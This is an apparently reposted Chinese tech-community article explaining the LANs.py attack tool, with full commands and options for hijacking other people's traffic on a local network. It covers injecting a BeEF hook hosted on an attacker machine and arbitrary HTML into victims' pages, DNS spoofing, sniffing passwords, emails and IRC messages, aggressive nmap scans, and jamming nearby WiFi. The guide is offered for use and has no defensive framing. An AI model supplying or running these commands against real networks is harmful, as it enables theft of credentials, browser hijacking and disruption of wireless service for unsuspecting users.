閱讀902 返回首頁    go 阿裏雲 go 技術社區[雲棲]


LANs.py:一款可以實現代碼注入,無線滲透和WiFi用戶監控的強大工具

LANs.py功能簡介

1.      自動尋找當前網絡中最為活躍的WLAN用戶,並對其中的一名用戶實施監控,然後向該用戶所訪問的Web頁麵注入任意HTML或JavaScript代碼;

2.      幹擾附近的WiFi網絡,幹擾範圍取決於無線網卡的性能。我們可以通過修改配置來實現幹擾所有人的WiFi信號或僅幹擾某一特定用戶的WiFi信號。但是LANs.py不支持對用戶同時進行WiFi幹擾和監聽。

依賴組件

Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目標用戶的IP地址,那麼你還需要一塊支持混雜模式的無線網卡)

測試環境為Kali Linux,發動攻擊的設備地址為192.168.0.5,目標設備的IP地址為192.168.0.10。

所有的可選操作項:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspointACCESSPOINT]

工具使用

目前該工具支持從以下協議收集數據:HTTP、FTP、IMAP、POP3和IRC。LANs.py將會打印出URL地址所返回的資源中前135個字符,並自動忽略結尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它還能夠輸出任意協議下傳輸的用戶名/密碼、以及接收或發送的電子郵件和IRC消息。

常用命令:

python LANs.py -u -p

其他常用命令:

python LANs.py -u -p -d -ip 192.168.0.10

-d:查看所有的圖片

-ip:設置目標IP地址

HTML注入:

python LANs.py -bhttps://192.168.0.5:3000/hook.js

向目標用戶所訪問的頁麵中注入一個BeEF鉤子( https://beefproject.com/ ,【 參考教程 】),注入的參數會包裹在<script>標簽中,所以你可以在一個JavaScript文件中的任意位置輸入內容。

python LANs.py -c'<title>Owned.</title>'

向目標用戶所訪問的頁麵中注入任意HTML代碼。工具首先會嚐試在第一個<head>標簽之後注入內容,如果失敗則嚐試在第一個</head>標簽之前注入內容。上麵給出的示例代碼會將頁麵標題(title)修改為’Owned.’。

讀取pcap文件:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

為了成功讀取pcap文件中的內容,你需要使用-ip參數指定目標IP。該功能的一個優點就是用戶無需使用root權限便可執行該腳本。

DNS欺騙:

python LANs.py -a -r 80.87.128.67

-a選項將會對目標發出的每一次DNS請求進行欺騙攻擊,並將用戶請求重定向至-r參數所製定的地址。無論用戶在地址欄中輸入的是什麼地址,他們都將會被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

該命令將會對域名eff.org及其子域名進行DNS欺騙。

其他使用:

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b https://192.168.0.5:3000/hook.js-ip 192.168.0.10

幹擾所有的WiFi網絡:

python LANs.py --jam

僅幹擾指定接入點:

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可用選項

常規使用:

-b BEEF_HOOK_URL:將BeEF hookURL注入到目標用戶所訪問的每一個頁麵中,例如-b https://192.168.1.10:3000/hook.js 。

-c ‘HTML CODE’:向目標用戶訪問的頁麵中注入任意HTML代碼。

-d:查看目標用戶訪問的圖片。

-dns DOMAIN:對指定DNS域名進行DNS欺騙攻擊,例如-dnsfacebook.com。

-a:對用戶的所有DNS請求進行DNS欺騙攻擊。

-r IPADDRESS: 僅用於-dnsDOMAIN選項。

-u:打印出目標用戶所使用的URL地址。

-i INTERFACE: 指定接口,例如-i wlan0。

-ip:指定目標IP地址。

-n: 對目標執行nmap掃描。

-na:在後台對目標執行更具攻擊性的nmap掃描,並將掃描結果輸出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP協議下傳輸的用戶名/密碼、以及接收或發送的電子郵件和IRC消息。

-pcap PCAP_FILE: 解析pcap文件中所有的數據包; 需要輸入-ip[target's IP address]參數。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-rip ROUTER_IP:指定路由器的IP地址。

–jam:對2.4GHz無線接入點以及客戶端進行幹擾攻擊。

WiFi幹擾:

-sMAC_Address_to_skip:指定需跳過的MAC地址。

-m MAXIMUM: 指定攻擊客戶端的最大數量。

-t TIME_INTERVAL: 設置攻擊間隔。

–packets NUMBER:指定每一次攻擊中發送的數據包數量。

–accesspoint ROUTER_MAC:輸入目標AP的MAC地址。


本文作者:佚名

來源:51CTO

最後更新:2017-11-02 15:04:27

  上一篇:go  蘋果手機id鎖怎樣能夠解開 iphone8鎖屏密碼忘記最多鎖多久
  下一篇:go  微博爬蟲“免登錄”技巧詳解及Java實現